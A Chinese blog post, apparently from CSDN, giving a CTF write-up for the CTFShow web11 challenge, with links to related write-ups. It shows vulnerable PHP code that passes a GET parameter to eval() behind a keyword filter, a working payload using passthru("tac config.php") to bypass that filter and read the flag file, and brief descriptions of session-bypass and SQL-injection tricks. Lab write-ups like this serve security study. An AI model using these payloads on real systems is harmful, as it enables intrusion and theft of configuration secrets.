【CTF Web】CTFShow web11 Writeup(RCE+PHP+代码审计)

已于 2024-05-29 18:49:45 修改
阅读量256 收藏
点赞数 4
分类专栏: CTF Writeup 文章标签: php 开发语言 web安全
于 2024-05-28 12:35:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/138007043
版权

web11

1
阿呆听完自己菜死了,自己呆了。决定修好漏洞,绝对不能让自己再菜死了。

解法

可知 flag 在 config.php。

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

cat 会被拦截,那就用 tac,从尾到头显示文件内容。发送 GET 请求:

https://9df70e10-e53e-4962-add7-44ac09411ff5.challenge.ctf.show/?c=passthru("tac config.php");

取得 flag。

Flag

ctfshow{35fa4ab2-411b-42b1-9e45-66aa5138c836}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CTFshow web入门]代码审计
Npceer-一位网安初学者的博客
08-09 488
前言 最近状态不太对 挺迷茫的 就先回来写点题练习练习 暑假也进入后半段了 摸鱼摸不动了 最近就学一下代码审计吧 找几个小CMS复现一下漏洞 然后在跟这Y4和feng师傅的博客复现一些框架好了 也稍微学一下工具的使用 sqlmap啊seay啊啥的 文章目录前言web301web302web302 web301 基础题 随便看一下 sql语句没有任何过滤 直接联合注入就行 $sql="select sds_password from sds_user where sds_username='".$usern
CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 456
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
ctfshow-WEB-web11( 利用session绕过登录验证)
热门推荐
wangyuxiang946的博客
09-06 1万+
ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过 页面中直接给了源码, 很明显是让我们进行代码审计,源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功 右键检查或者按F12, 进入开发者模式, 查看浏览器的session, 后端代码就是拿这个session的value值与我们输入的密码进行匹配, 由于这个value值我没解密出来, 所以这里干脆一点, 直...
CTF_webshow_web11
weixin_54227009的博客
05-14 268
d打开靶机,直接有源码 查看一下 <?php //过滤了如下关键字 function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } //密码进行长度对比,防止双写绕过 ...
ctfshow-web入门-信息搜集(web11-web20)
最新发布
Welcome To Myon'Blog !
06-02 1342
X探针:又名刘海探针、X-Prober,是一款由 INN STUDIO 原创主导开发的开源 PHP 探针,拥有美观简洁的界面、极高的运行效率和极低的资源占用,能高精度显示服务器的相应信息。php 探针:用来探测空间、服务器运行状况和 PHP 信息,探针可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息。雅黑 php 探针:每秒更新,不用刷网页,适用于Linux系统,可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息。
ctf.show_web11
qq_62046696的博客
06-11 1027
目录ctf.show_web11ctf.show_web12 ,password是由我们自己输入的,session中的password存储在本地,所以我们只需要输入空密码,并且将本地的session删除即可成功绕过。右击删除然后输入空,或者方法二:burp抓包 因为字段都为空,所以就会等于 刚开始也是发懵,看了大佬的wp恍然大悟可谓是,先ctrl+u查看源码发现有一个?cmd既然提示了cmd=,那么可能后端代码中存在 eval() 或者exec()等可以执行命令的代码。 然后?cmd=phpin
CTF.show:web11
qq_46230755的博客
01-15 236
代码审计 <?php function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if(strlen($password)!=strlen(replaceSpecialChar
刷题之旅第32站,CTFshow web11
cc菜的一批
02-17 941
感谢ctf show平台提供题目 放眼望去,全是php代码,代码审计题目无疑了。 我们看到这部分,只要让输入框的内容 等于 session 的值就好了。 if($password==$_SESSION['password']){ 我们打开F12,找到存储,删除里面的phpsessionid 这样session的值就是空了,那么我们再提交空密码,就会相等了。 结语: 菜鸡的cc师傅,将会持...
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
ShenZ的博客
04-18 702
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php中传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
Dest0g3 520迎新赛 writeup (misc部分 + web部分)
ShenZ的博客
05-30 3381
Dest0g3 520迎新赛 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
[极客大挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 398
我以后再半夜开题目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x大佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
ctfshow吃瓜杯 web writeup
ashMOB的博客
11-16 897
ctfshow吃瓜杯 web writeup shellme 进去就是phpinfo,Ctrl+f搜一下就行 热身 简单的代码审计 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){
code blue CTF 2019 fopen RCE 漏洞的 Writeup
systemino的博客
11-22 544
0x01 介绍 最近,我在打CODE BLUE CTF 2019决赛,里面有一道题目是通过fopen的第二个参数进行RCE,奇热在这篇文章我会详细说明解这道题目的方法。 首先,将下面两个文件放在/home/user目录: gconv-modules modulePAYLOAD//INTERNAL../../../../../../../../home/user/pa...
ctfshow-萌新-web11( 利用命令执行漏洞获取网站敏感文件)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web11关, 这一关考察的是命令执行漏洞的利用, 源码中过滤了一部分命令执行函数和文件查看的命令, 推荐使用 passthru()函数配合 more命令获取敏感文件中的flag 页面中展示了一部分源码, 并提示flag就在 config.php文件中 源码过滤了参数中的 system, exec, highlight, cat 等关键字, 我们使用passthru()函数来执行系统命令, 查看文件内容的话可以使用 more命令来代替 cat, 先查看一...
ctfshow web11
A86445的博客
12-06 65
是SQL注入但是这点代码猜半天注入无果,一开始我以为$_SESSION['password']是接收的post用户输入的passwrod但是没想到是我PHP没学好大意了,后面假设$password是用户输入,那么我们只需要清除浏览器会话cookie即可登录成功。和web10差不多,一开始我以为只是给了代码片段,用御剑扫描无果(好吧其实是字典太拉了),
CTF show WEB11
羽的博客
02-17 2579
题目地址:https://ctf.show 打开网站显示如下源码: <?php function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($r...
CTF-show WEB入门--web11
m0_73912575的博客
01-03 551
CTF-show WEB入门--web11
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值